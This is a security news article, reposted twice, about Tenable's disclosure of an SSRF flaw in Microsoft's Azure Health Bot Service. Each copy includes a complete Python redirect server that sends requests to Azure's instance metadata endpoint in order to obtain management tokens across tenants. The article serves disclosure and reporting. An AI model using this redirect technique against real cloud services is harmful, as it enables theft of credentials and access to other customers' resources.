Critical SSRF Vulnerability in Microsoft Azure Let Hackers Compromise Health Bot Services
- С сайта: Vulnerability(cybersecuritynews.com)
- Вернуться к списку новостей
С сайта: Vulnerability(cybersecuritynews.com)
Tenable Research has uncovered significant security vulnerabilities in Microsoft’s Azure Health Bot Service, a cloud platform designed to enable healthcare professionals to deploy AI-powered virtual health assistants.
The Azure AI Health Bot Service is a cloud-based platform designed for healthcare organizations. It enables developers to create and deploy AI-driven virtual health assistants, which help streamline processes and reduce costs while ensuring compliance with industry standards.
These vulnerabilities allowed unauthorized access to cross-tenant resources, raising concerns about potential lateral movement to other resources within the service.
Tenable’s investigation focused on a feature called “Data Connections,” which allows the Azure Health Bot Service to interact with external data sources. While testing these data connections, researchers discovered a server-side request forgery (SSRF) vulnerability.
This vulnerability enabled them to bypass existing security filters and access sensitive internal endpoints, such as Azure’s Internal Metadata Service (IMDS).
Technical Analysis
The SSRF vulnerability was exploited by configuring a data connection to redirect requests to an external host controlled by the Attackers.
The host was set up to respond with a 301 redirect to the IMDS endpoint, allowing the researchers to obtain a valid metadata response. Using this response, they acquired an access token for management.azure.com and subsequently listed subscriptions and resources belonging to other customers.
The Tannable researchers employed a Python script to set up the HTTP server that facilitated the SSRF attack:
#!/usr/bin/python3 from http.server import HTTPServer, BaseHTTPRequestHandler
def servePage(s, hverb): s.protocol_version = 'HTTP/1.1' s.server_version = 'Microsoft-IIS/8.5' s.sys_version = '' s.send_response(301) s.send_header('Location', 'http://169.254.169.254/metadata/instance?api-version=2021-12-13') s.end_headers() message = "" s.wfile.write(bytes(message, "utf8")) return
class StaticServer(BaseHTTPRequestHandler): def do_GET(self): servePage(self, "GET") return
def main(server_class=HTTPServer, handler_class=StaticServer, port=80): server_address = ('', port) httpd = server_class(server_address, handler_class) httpd.serve_forever()
main()
This host wasconfigured torespond to requests witha 301 redirect response destinedfor Azure’s IMDS. Using thistechnique, attackers could obtain avalid metadataresponse andsubsequently obtainan access token formanagement.azure.com.
Response and Mitigation
Upon discovering the vulnerabilities, Tenable immediately reported them to Microsoft’s Security Response Center (MSRC) on June 17, 2024. MSRC quickly acknowledged the report and began implementing fixes.
Tenable later identified another vulnerable endpoint for validating FHIR endpoints’ data connections. Although this endpoint was susceptible to a similar attack, it did not allow cross-tenant access. This second issue was reported on July 9, with fixes implemented by July 12.
These vulnerabilities underscore the importance of robust web applications and cloud security mechanisms, even in AI-powered services.
While no evidence suggests that malicious actors exploited these vulnerabilities, the incident highlights the need for continuous security auditing and proactive vulnerability management.
#Vulnerability #cyber_security #cyber_security_news #vulnerability
Оригинальная версия на сайте:
Critical SSRF Vulnerability in Microsoft Azure Let Hackers Compromise Health Bot Services
Author: Balaji NTenable Research has uncovered significant security vulnerabilities in Microsoft’s Azure Health Bot Service, a cloud platform designed to enable healthcare professionals to deploy AI-powered virtual health assistants.
The Azure AI Health Bot Service is a cloud-based platform designed for healthcare organizations. It enables developers to create and deploy AI-driven virtual health assistants, which help streamline processes and reduce costs while ensuring compliance with industry standards.
These vulnerabilities allowed unauthorized access to cross-tenant resources, raising concerns about potential lateral movement to other resources within the service.
Tenable’s investigation focused on a feature called “Data Connections,” which allows the Azure Health Bot Service to interact with external data sources. While testing these data connections, researchers discovered a server-side request forgery (SSRF) vulnerability.
This vulnerability enabled them to bypass existing security filters and access sensitive internal endpoints, such as Azure’s Internal Metadata Service (IMDS).
Technical Analysis
The SSRF vulnerability was exploited by configuring a data connection to redirect requests to an external host controlled by the Attackers.
The host was set up to respond with a 301 redirect to the IMDS endpoint, allowing the researchers to obtain a valid metadata response. Using this response, they acquired an access token for management.azure.com and subsequently listed subscriptions and resources belonging to other customers.
The Tannable researchers employed a Python script to set up the HTTP server that facilitated the SSRF attack:
#!/usr/bin/python3 from http.server import HTTPServer, BaseHTTPRequestHandler
def servePage(s, hverb): s.protocol_version = 'HTTP/1.1' s.server_version = 'Microsoft-IIS/8.5' s.sys_version = '' s.send_response(301) s.send_header('Location', 'http://169.254.169.254/metadata/instance?api-version=2021-12-13') s.end_headers() message = "" s.wfile.write(bytes(message, "utf8")) return
class StaticServer(BaseHTTPRequestHandler): def do_GET(self): servePage(self, "GET") return
def main(server_class=HTTPServer, handler_class=StaticServer, port=80): server_address = ('', port) httpd = server_class(server_address, handler_class) httpd.serve_forever()
main()
This host wasconfigured torespond to requests witha 301 redirect response destinedfor Azure’s IMDS. Using thistechnique, attackers could obtain avalid metadataresponse andsubsequently obtainan access token formanagement.azure.com.
Response and Mitigation
Upon discovering the vulnerabilities, Tenable immediately reported them to Microsoft’s Security Response Center (MSRC) on June 17, 2024. MSRC quickly acknowledged the report and began implementing fixes.
Tenable later identified another vulnerable endpoint for validating FHIR endpoints’ data connections. Although this endpoint was susceptible to a similar attack, it did not allow cross-tenant access. This second issue was reported on July 9, with fixes implemented by July 12.
These vulnerabilities underscore the importance of robust web applications and cloud security mechanisms, even in AI-powered services.
While no evidence suggests that malicious actors exploited these vulnerabilities, the incident highlights the need for continuous security auditing and proactive vulnerability management.
#Vulnerability #cyber_security #cyber_security_news #vulnerability
Оригинальная версия на сайте:
